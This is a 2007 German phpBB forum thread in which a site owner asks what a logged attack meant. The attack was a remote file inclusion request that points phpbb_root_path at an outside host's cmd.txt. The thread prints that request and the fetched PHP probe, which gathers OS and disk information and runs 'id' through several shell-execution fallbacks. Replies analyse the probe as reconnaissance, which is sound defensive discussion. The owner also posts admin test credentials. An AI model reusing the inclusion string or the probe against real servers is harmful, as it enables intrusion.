phpBB.de

phpBB.de - Die deutsche phpBB-Community
https://www.phpbb.de/community/

Hack versuch!

https://www.phpbb.de/community/viewtopic.php?t=150555

Seite 1 von 2

Hack versuch!

Verfasst: 14.06.2007 12:33
von Nordin
Hallo Leute,

ich habe hab meinen CTXtra zu testzwecken auf www.soziales-forum.de installiert, da dort mega viel spam ankommt...

(wer mal reinschauen möchte: link: www.soziales-forum.de/portal/ctracker benutzer:Admin password:Admindummy - hab alle löschen/speichern/ändern - butten entfernt)

jedenfalls wurde heute folgender Angriff geloggt:
/portal/mycookies.php/includes/functions.php?phpbb_root_path=http://lifechangerscc.com//catalog/includes/cmd.txt?
IP: 212.69.210.203

dort findet man dann:

Code: Alles auswählen

<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir); 

if ($free === FALSE) {$free = 0;} 

if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size) 

{ 

if (!is_numeric($size)) {return FALSE;} 

else 

{ 

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 

else {$size = $size . " B";} 

return $size; 

}} 

exit;
Was wollte er mit diesem code bezwecken???

PS

Verfasst: 14.06.2007 13:24
von SZOMM
Hallo Nordin,

reinschauen is ja wohl nich' ...

Ist das denn überhaupt ein phpBB - Forum ?

Alles Gute
Pèdà
*end*

Verfasst: 14.06.2007 14:28
von Nordin
Ist das denn überhaupt ein phpBB - Forum ?
Sorry aber lesen kannst du oder? Unten im Footer steht "powered by phpBB" *kopfschüttel* sonst würde ich hier ja nicht fragen...

Das ganze dingen ist ein Integramod... basierend auf phpBB... soweit ich weiß war das version phpBB2 oder so...

PS

Verfasst: 14.06.2007 15:49
von SZOMM
Eine persönliche Anrede hältst du ja für unnötig, OK ich mach mit ...
Meine Lesekenntnisse haben zumindest für über 1000 Bücher gereicht ...
Deine Seite wurde von einem Spieleportal oder etwas ähnlichem überlagert
die darüberhinaus sehr langsam geladen hat ...
Na egal, is' ja deine Seite

Empfehle dir dennoch, trotz deiner leicht überheblichen Art, einige der für
phpbb erhältlichen SicherheitsMOD's zu installieren, z. B:
Advanced_Visual_Confirmation
IP_Tracker v2.2.2
advanced_ip_tools_pack
Manage_Guest_Permissions
Secure_First_Admin
ggf. den CrackerTracker v5
LINK-Liste von mgutt

Mit Bestem Wunsch für deine Persönlichkeitsentwicklung
Pèdà
*end*

Verfasst: 14.06.2007 16:05
von Nordin
Hallo SZOMM,

also meine is nur noch dazu da SPAM zu sammeln... (kein Scherz)

Ich will nichts installieren oder irgendwas anderes... ich wollte nur wissen was der jenige mit dem Code bezwecken will bzw. wollte??

Nich mehr und nicht weniger. ..

PS...

Verfasst: 14.06.2007 18:40
von SZOMM
Hallo Nordin,

.....
Zitat:
/portal/mycookies.php/includes/functions.php?phpbb_root_path=http://lifechangerscc.com//catalog/includes/cmd.txt?
IP: 212.69.210.203
-> Das scheint der Verursacher zu sein <-
dort findet man dann:
Code:
<?
$dir = @getcwd();
-> Hier wird was?(Webspace/Festplatte) ermittelt (1)<-
echo "Mic22<br>";
$OS = @PHP_OS; -> Betriebssystem-Ermittlung <-
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);
-> Hier wird die Größe von (1) ermittelt <-

... Gekürzt aus Zeitmangel ... Sorry !
Muß was dringendes erledigen, vieleicht später mehr

Was wollte er mit diesem code bezwecken???

Garantiert nichts Gutes !

Alles Gute für dich
Pèdà
*end*

Verfasst: 14.06.2007 18:53
von Nordin
-> Das scheint der Verursacher zu sein <-
dort findet man dann:
Code:
Ja das is mir klar daher hab ich den code ja...

und das er nichts gutes wollte kann ich mir auch denken... phpBB is nich mein gebiet... ehr SMF von daher frag ich hier nach ob jemand was aus dem code rauslesen was er mit diesem code bezwecken wollte.

Verfasst: 14.06.2007 19:08
von Jan500
so wie ich das sehe, gibt das script nur den freien space aus und dann noch die user und group id des jeweiligen users, der sich angemeldet hat (also den apache user)

aber keine sorge...
1. funktioniert die phpbb_root_path methode beim 2.0.22 nicht
2. haben meisten server shell_exec nicht erlaubt bzw nur eingeschränkt
3. wenn würde er nicht wirklich viel mit dem ergebniss anfangen können (so wie ich das sehe)

Jan

Verfasst: 14.06.2007 19:31
von Pyramide
Warscheinlich ist das erstmal nur ein Testlauf, um zu sehen ob der Server überhaupt für "richtige" Angriffe verwundbar ist.

Verfasst: 14.06.2007 19:35
von Nordin
ahh ok das is doch mal ne aussage... ich werd das mal weiter beobachten... vom mir aus kann der da machen was er will das board is eh "down" von daher würd ich mich soagar freuen das er es irgedwie schaft da was zu machen... so kann ich die lücke dann mit in den CTracker einbauen kann...
Alle Zeiten sind UTC+02:00
Seite 1 von 2

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de